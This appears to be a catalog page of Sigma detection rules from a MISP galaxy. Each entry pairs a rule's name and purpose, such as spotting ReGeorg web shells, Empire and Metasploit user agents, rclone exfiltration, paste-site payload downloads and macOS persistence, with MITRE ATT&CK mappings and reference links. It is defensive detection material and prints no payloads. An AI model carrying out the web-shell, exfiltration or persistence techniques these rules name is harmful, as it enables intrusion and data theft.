https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml

Webshell ReGeorg Detection Via Web Logs

Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.

The tag is: misp-galaxy:sigma-rules="Webshell ReGeorg Detection Via Web Logs"

Webshell ReGeorg Detection Via Web Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11398. Table References

Links

https://github.com/sensepost/reGeorg

https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml

Successful IIS Shortname Fuzzing Scan

When IIS uses an old .Net Framework it’s possible to enumerate folders with the symbol "~"

The tag is: misp-galaxy:sigma-rules="Successful IIS Shortname Fuzzing Scan"

Successful IIS Shortname Fuzzing Scan has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11399. Table References

Links

https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml

https://www.exploit-db.com/exploits/19525

https://github.com/lijiejie/IIS_shortname_Scanner

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml

Suspicious Windows Strings In URI

Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Strings In URI"

Suspicious Windows Strings In URI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11400. Table References

Links

https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_windows_path_uri.yml

Server Side Template Injection Strings

Detects SSTI attempts sent via GET requests in access logs

The tag is: misp-galaxy:sigma-rules="Server Side Template Injection Strings"

Server Side Template Injection Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

Table 11401. Table References

Links

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/payloadbox/ssti-payloads

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml

PUA - Advanced IP/Port Scanner Update Check

Detect the update check performed by Advanced IP/Port Scanner utilities.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced IP/Port Scanner Update Check"

PUA - Advanced IP/Port Scanner Update Check has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"

Table 11402. Table References

Links

https://www.advanced-port-scanner.com/

https://www.advanced-ip-scanner.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml

HackTool - Empire UserAgent URI Combo

Detects user agent and URI paths used by empire agents

The tag is: misp-galaxy:sigma-rules="HackTool - Empire UserAgent URI Combo"

HackTool - Empire UserAgent URI Combo has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11403. Table References

Links

https://github.com/BC-SECURITY/Empire

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml

APT User Agent

Detects suspicious user agent strings used in APT malware in proxy logs

The tag is: misp-galaxy:sigma-rules="APT User Agent"

APT User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11404. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_apt.yml

Potential Base64 Encoded User-Agent

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

The tag is: misp-galaxy:sigma-rules="Potential Base64 Encoded User-Agent"

Potential Base64 Encoded User-Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11405. Table References

Links

https://blogs.jpcert.or.jp/en/2022/07/yamabot.html

https://deviceatlas.com/blog/list-of-user-agent-strings#desktop

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml

Bitsadmin to Uncommon TLD

Detects Bitsadmin connections to domains with uncommon TLDs

The tag is: misp-galaxy:sigma-rules="Bitsadmin to Uncommon TLD"

Bitsadmin to Uncommon TLD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11406. Table References

Links

https://twitter.com/jhencinski/status/1102695118455349248

https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml

HackTool - BabyShark Agent Default URL Pattern

Detects Baby Shark C2 Framework default communication patterns

The tag is: misp-galaxy:sigma-rules="HackTool - BabyShark Agent Default URL Pattern"

HackTool - BabyShark Agent Default URL Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11407. Table References

Links

https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml

Exploit Framework User Agent

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

The tag is: misp-galaxy:sigma-rules="Exploit Framework User Agent"

Exploit Framework User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11408. Table References

Links

https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_frameworks.yml

Windows WebDAV User Agent

Detects WebDav DownloadCradle

The tag is: misp-galaxy:sigma-rules="Windows WebDAV User Agent"

Windows WebDAV User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11409. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml

Download from Suspicious Dyndns Hosts

Detects download of certain file types from hosts with dynamic DNS names (selected list)

The tag is: misp-galaxy:sigma-rules="Download from Suspicious Dyndns Hosts"

Download from Suspicious Dyndns Hosts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"

Table 11410. Table References

Links

https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_dyndns.yml

Suspicious User Agent

Detects suspicious malformed user agent strings in proxy logs

The tag is: misp-galaxy:sigma-rules="Suspicious User Agent"

Suspicious User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11411. Table References

Links

https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp.yml

Telegram API Access

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

The tag is: misp-galaxy:sigma-rules="Telegram API Access"

Telegram API Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 11412. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml

Download From Suspicious TLD - Whitelist

Detects executable downloads from suspicious remote systems

The tag is: misp-galaxy:sigma-rules="Download From Suspicious TLD - Whitelist"

Download From Suspicious TLD - Whitelist has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11413. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml

HTTP Request With Empty User Agent

Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.

The tag is: misp-galaxy:sigma-rules="HTTP Request With Empty User Agent"

HTTP Request With Empty User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11415. Table References

Links

https://twitter.com/Carlos_Perez/status/883455096645931008

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_empty.yml

Windows PowerShell User Agent

Detects Windows PowerShell Web Access

The tag is: misp-galaxy:sigma-rules="Windows PowerShell User Agent"

Windows PowerShell User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11416. Table References

Links

https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_powershell.yml

Suspicious Network Communication With IPFS

Detects connections to interplanetary file system (IPFS) containing a user’s email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.

The tag is: misp-galaxy:sigma-rules="Suspicious Network Communication With IPFS"

Suspicious Network Communication With IPFS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 11417. Table References

Links

https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638

https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11

https://blog.talosintelligence.com/ipfs-abuse/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml

Bitsadmin to Uncommon IP Server Address

Detects Bitsadmin connections to IP addresses instead of FQDN names

The tag is: misp-galaxy:sigma-rules="Bitsadmin to Uncommon IP Server Address"

Bitsadmin to Uncommon IP Server Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11418. Table References

Links

https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml

Rclone Activity via Proxy

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

The tag is: misp-galaxy:sigma-rules="Rclone Activity via Proxy"

Rclone Activity via Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 11419. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone

https://rclone.org/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml

Crypto Miner User Agent

Detects suspicious user agent strings used by crypto miners in proxy logs

The tag is: misp-galaxy:sigma-rules="Crypto Miner User Agent"

Crypto Miner User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11420. Table References

Links

https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h

https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_cryptominer.yml

F5 BIG-IP iControl Rest API Command Execution - Proxy

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

The tag is: misp-galaxy:sigma-rules="F5 BIG-IP iControl Rest API Command Execution - Proxy"

F5 BIG-IP iControl Rest API Command Execution - Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11421. Table References

Links

https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash

https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029

https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml

Raw Paste Service Access

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

The tag is: misp-galaxy:sigma-rules="Raw Paste Service Access"

Raw Paste Service Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

Table 11422. Table References

Links

https://www.virustotal.com/gui/domain/paste.ee/relations

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_raw_paste_service_access.yml

Suspicious Base64 Encoded User-Agent

Detects suspicious encoded User-Agent strings, as seen used by some malware.

The tag is: misp-galaxy:sigma-rules="Suspicious Base64 Encoded User-Agent"

Suspicious Base64 Encoded User-Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11423. Table References

Links

https://deviceatlas.com/blog/list-of-user-agent-strings#desktop

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml

Download From Suspicious TLD - Blacklist

Detects download of certain file types from hosts in suspicious TLDs

The tag is: misp-galaxy:sigma-rules="Download From Suspicious TLD - Blacklist"

Download From Suspicious TLD - Blacklist has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11424. Table References

Links

https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/

https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf

https://www.spamhaus.org/statistics/tlds/

https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml

PwnDrp Access

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

The tag is: misp-galaxy:sigma-rules="PwnDrp Access"

PwnDrp Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

Table 11426. Table References

Links

https://breakdev.org/pwndrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pwndrop.yml

Hack Tool User Agent

Detects suspicious user agent strings user by hack tools in proxy logs

The tag is: misp-galaxy:sigma-rules="Hack Tool User Agent"

Hack Tool User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11427. Table References

Links

http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules

https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml

Flash Player Update from Suspicious Location

Detects a flashplayer update from an unofficial location

The tag is: misp-galaxy:sigma-rules="Flash Player Update from Suspicious Location"

Flash Player Update from Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 11428. Table References

Links

https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml

Search-ms and WebDAV Suspicious Indicators in URL

Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.

The tag is: misp-galaxy:sigma-rules="Search-ms and WebDAV Suspicious Indicators in URL"

Search-ms and WebDAV Suspicious Indicators in URL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 11429. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_webdav_search_ms.yml

Startup Items

Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.

The tag is: misp-galaxy:sigma-rules="Startup Items"

Startup Items has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"

Table 11430. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml

MacOS Emond Launch Daemon

Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

The tag is: misp-galaxy:sigma-rules="MacOS Emond Launch Daemon"

MacOS Emond Launch Daemon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Emond - T1546.014" with estimative-language:likelihood-probability="almost-certain"

Table 11431. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md

https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml

JXA In-memory Execution Via OSAScript

Detects possible malicious execution of JXA in-memory via OSAScript

The tag is: misp-galaxy:sigma-rules="JXA In-memory Execution Via OSAScript"

JXA In-memory Execution Via OSAScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 11432. Table References

Links

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml

Suspicious Microsoft Office Child Process - MacOS

Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution

The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft Office Child Process - MacOS"

Suspicious Microsoft Office Child Process - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11433. Table References

Links

https://objective-see.org/blog/blog_0x4B.html

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml

Security Software Discovery - MacOs

Detects usage of system utilities (only grep for now) to discover security software discovery

The tag is: misp-galaxy:sigma-rules="Security Software Discovery - MacOs"

Security Software Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11434. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml

OSACompile Run-Only Execution

Detects potential suspicious run-only executions compiled using OSACompile

The tag is: misp-galaxy:sigma-rules="OSACompile Run-Only Execution"

OSACompile Run-Only Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11435. Table References

Links

https://ss64.com/osx/osacompile.html

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml

System Integrity Protection (SIP) Enumeration

Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.

The tag is: misp-galaxy:sigma-rules="System Integrity Protection (SIP) Enumeration"

System Integrity Protection (SIP) Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11436. Table References

Links

https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior

https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/

https://objective-see.org/blog/blog_0x6D.html

https://ss64.com/osx/csrutil.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml

System Information Discovery Using sw_vers

Detects the use of "sw_vers" for system information discovery

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using sw_vers"

System Information Discovery Using sw_vers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11437. Table References

Links

https://ss64.com/osx/sw_vers.html

https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior

https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml

System Integrity Protection (SIP) Disabled

Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.

The tag is: misp-galaxy:sigma-rules="System Integrity Protection (SIP) Disabled"

System Integrity Protection (SIP) Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11438. Table References

Links

https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior

https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/

https://objective-see.org/blog/blog_0x6D.html

https://ss64.com/osx/csrutil.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml

Screen Capture - macOS

Detects attempts to use screencapture to collect macOS screenshots

The tag is: misp-galaxy:sigma-rules="Screen Capture - macOS"

Screen Capture - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11439. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml

Clipboard Data Collection Via OSAScript

Detects possible collection of data from the clipboard via execution of the osascript binary

The tag is: misp-galaxy:sigma-rules="Clipboard Data Collection Via OSAScript"

Clipboard Data Collection Via OSAScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11440. Table References

Links

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml

System Information Discovery Using Ioreg

Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using Ioreg"

System Information Discovery Using Ioreg has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11441. Table References

Links

https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior

https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior

https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml

File and Directory Discovery - MacOS

Detects usage of system utilities to discover files and directories

The tag is: misp-galaxy:sigma-rules="File and Directory Discovery - MacOS"

File and Directory Discovery - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11442. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml

MacOS Scripting Interpreter AppleScript

Detects execution of AppleScript of the macOS scripting language AppleScript.

The tag is: misp-galaxy:sigma-rules="MacOS Scripting Interpreter AppleScript"

MacOS Scripting Interpreter AppleScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11443. Table References

Links

https://redcanary.com/blog/applescript/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml

Osacompile Execution By Potentially Suspicious Applet/Osascript

Detects potential suspicious applet or osascript executing "osacompile".

The tag is: misp-galaxy:sigma-rules="Osacompile Execution By Potentially Suspicious Applet/Osascript"

Osacompile Execution By Potentially Suspicious Applet/Osascript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11444. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

